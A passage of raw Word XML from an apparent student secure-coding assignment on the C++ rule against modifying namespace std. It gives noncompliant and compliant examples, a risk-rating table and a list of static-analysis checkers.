              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="48B2377D" w14:textId="0146CA74" w:rsidR="00B475A1" w:rsidRDefault="002C77D1" w:rsidP="00F51FA8">
            <w:r w:rsidRPr="002C77D1">
              <w:t>Do not modify the standard namespaces</w:t>
            </w:r>
            <w:r w:rsidR="00AE59EA">
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidR="00C6622E" w:rsidRPr="00C6622E">
              <w:t xml:space="preserve">Do not add declarations or definitions to the standard namespaces std or </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00C6622E" w:rsidRPr="00C6622E">
              <w:t>posix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00C6622E" w:rsidRPr="00C6622E">
              <w:t>, or to a namespace contained therein, except for a template specialization that depends on a user-defined type that meets the standard library requirements for the original template.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53AECA82"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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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05C0C48" w:rsidR="00F72634" w:rsidRDefault="004E24C9" w:rsidP="00A72503">
            <w:r w:rsidRPr="004E24C9">
              <w:t>In this noncompliant code example, the declaration of x is added to the namespace std, resulting in undefined behavior.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="1F240B56" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5A705A32" w14:textId="77777777" w:rsidR="004E24C9" w:rsidRDefault="004E24C9" w:rsidP="004E24C9">
            <w:r>
              <w:t>namespace std {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23410D27" w14:textId="77777777" w:rsidR="004E24C9" w:rsidRDefault="004E24C9" w:rsidP="004E24C9">
            <w:r>
              <w:t xml:space="preserve">int </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>x;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="01CC8C03" w14:textId="11A2549B" w:rsidR="00F72634" w:rsidRDefault="004E24C9" w:rsidP="004E24C9">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44D39738"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A72503">
            <w:r>
              <w:rPr>
                <w:b/>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9B27B00" w:rsidR="00F72634" w:rsidRDefault="005467BB" w:rsidP="00A72503">
            <w:r w:rsidRPr="005467BB">
              <w:t>This compliant solution assumes the intention of the programmer was to place the declaration of x into a namespace to prevent collisions with other global identifiers. Instead of placing the declaration into the namespace std, the declaration is placed into a namespace without a reserved name.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F72634" w14:paraId="2A6DB0E0" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10800" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EDEDED"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5F1772E8" w14:textId="77777777" w:rsidR="005467BB" w:rsidRDefault="005467BB" w:rsidP="005467BB">
            <w:r>
              <w:t xml:space="preserve">namespace </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>nonstd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21A0111D" w14:textId="77777777" w:rsidR="005467BB" w:rsidRDefault="005467BB" w:rsidP="005467BB">
            <w:r>
              <w:t xml:space="preserve">int </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>x;</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
          </w:p>
          <w:p w14:paraId="0D2047C3" w14:textId="14BD4F6B" w:rsidR="00F72634" w:rsidRDefault="005467BB" w:rsidP="005467BB">
            <w:r>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D273B38" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00B475A1">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7517B5DF" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="54BB6B49">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Int_WgV9MlTl"/>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Note: Stop here for the milestone. Complete this section for Project One in Module Six.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>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770B6CC" w14:textId="70EF75C4" w:rsidR="00FE46A3" w:rsidRPr="00FE46A3" w:rsidRDefault="00B475A1" w:rsidP="54BB6B49">
            <w:pPr>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Principles(s):</w:t>
            </w:r>
            <w:r w:rsidR="007E34BE">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00FE46A3" w:rsidRPr="00FE46A3">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>4. Keep It Simple:</w:t>
            </w:r>
            <w:r w:rsidR="00FE46A3">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00905638">
              <w:t>Modifying standard namespaces adds complexity and can lead to unexpected behavior, making the codebase harder to maintain and audit.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29A926BF" w14:textId="231B3FF1" w:rsidR="00B475A1" w:rsidRDefault="007E34BE" w:rsidP="54BB6B49">
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>10.</w:t>
            </w:r>
            <w:r w:rsidR="00B475A1">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="006B3986">
              <w:rPr>
                <w:rStyle w:val="Strong"/>
              </w:rPr>
              <w:t>Adopt a Secure Coding Standard</w:t>
            </w:r>
            <w:r w:rsidR="006B3986">
              <w:t>: This principle aligns directly with the guideline to avoid modifying standard namespaces. By adhering to this rule, developers ensure consistency with secure coding practices and reduce the risk of conflicts, unintended behaviors, or vulnerabilities that could arise from modifying core library namespaces.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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17ECE27E" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="75B9C427" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remediation Cost</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72A6F7D6" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Priority</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A7ECDB3" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Level</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B475A1" w14:paraId="58D4006C" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1806" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="220323A9" w14:textId="127BA004" w:rsidR="00B475A1" w:rsidRDefault="00AC1DD9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D7BD83E" w14:textId="4E881EA5" w:rsidR="00B475A1" w:rsidRDefault="00AC1DD9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Unlikely</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4323B829" w14:textId="60D83F34" w:rsidR="00B475A1" w:rsidRDefault="00AC1DD9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C5CDDA0" w14:textId="373465E2" w:rsidR="00B475A1" w:rsidRDefault="00AC1DD9" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>P6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1805" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="21AF3013" w14:textId="0B42E890" w:rsidR="00B475A1" w:rsidRDefault="00AC1DD9"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rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2A7DCED1" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3773F3D4" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Checker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="765DE5ED" w14:textId="77777777" w:rsidR="00B475A1" w:rsidRDefault="00B475A1" w:rsidP="00F51FA8">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0015616F" w14:paraId="5119F648" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E9F9059" w14:textId="7983557B" w:rsidR="0015616F" w:rsidRDefault="00000000" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId112" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="0015616F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Axivion</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="0015616F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> Bauhaus Suite</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A716053" w14:textId="6576CFB2" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>7.2.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A89409F" w14:textId="29F3EA98" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="cente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++-DCL58</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E80DFE4" w14:textId="0D7B9FD7" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0015616F" w14:paraId="02EA69EA" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C0A1ACB" w14:textId="20A6DD5B" w:rsidR="0015616F" w:rsidRDefault="00000000" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId113" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="0015616F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>CodeSonar</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AB2DA80" w14:textId="153B4A14" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>8.1p0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1A754AFA" w14:textId="6FB0DE11" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>LANG.STRUCT.DECL.SNM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20CA1092" w14:textId="23FD5FA1" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Modification of Standard Namespaces</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0015616F" w14:paraId="2317C10F" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="75EDE44F" w14:textId="22B1BF7D" w:rsidR="0015616F" w:rsidRDefault="00000000" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId114" w:history="1">
              <w:r w:rsidR="0015616F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Helix QAC</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="425CB4A5" w14:textId="1B0F25A7" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="798AF7C7" w14:textId="1C721B44" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>C++3180, C++3181, C++3182</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63508554" w14:textId="608CCE27" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0015616F" w14:paraId="3199BEA0" w14:textId="77777777" w:rsidTr="00D6729C">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6156123F" w14:textId="2CED1AA2" w:rsidR="0015616F" w:rsidRDefault="00000000" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId115" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="0015616F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Klocwork</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3E06E4C3" w14:textId="2E38F618" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2024.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2982D991" w14:textId="3F3A1F58" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Strong"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>CERT.DCL.STD_NS_MODIFIED </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3611" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1BE16984" w14:textId="33D13E7F" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0015616F" w14:paraId="763D0227" w14:textId="77777777" w:rsidTr="00001F14">
        <w:trPr>
          <w:trHeight w:val="460"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1807" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BEC1ECA" w14:textId="1DC6AD49" w:rsidR="0015616F" w:rsidRDefault="00000000" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:hyperlink r:id="rId116" w:history="1">
              <w:proofErr w:type="spellStart"/>
              <w:r w:rsidR="0015616F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t>Parasoft</w:t>
              </w:r>
              <w:proofErr w:type="spellEnd"/>
              <w:r w:rsidR="0015616F">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                  <w:color w:val="0052CC"/>
                  <w:sz w:val="21"/>
                  <w:szCs w:val="21"/>
                </w:rPr>
                <w:t xml:space="preserve"> C/C++test</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1341" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C6600F4" w14:textId="1B805CF6" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="conf-macro"/>
                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                <w:color w:val="172B4D"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>2023.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4021" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="303F54C0" w14:textId="5753FB5D" w:rsidR="0015616F" w:rsidRDefault="0015616F" w:rsidP="0015616F">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
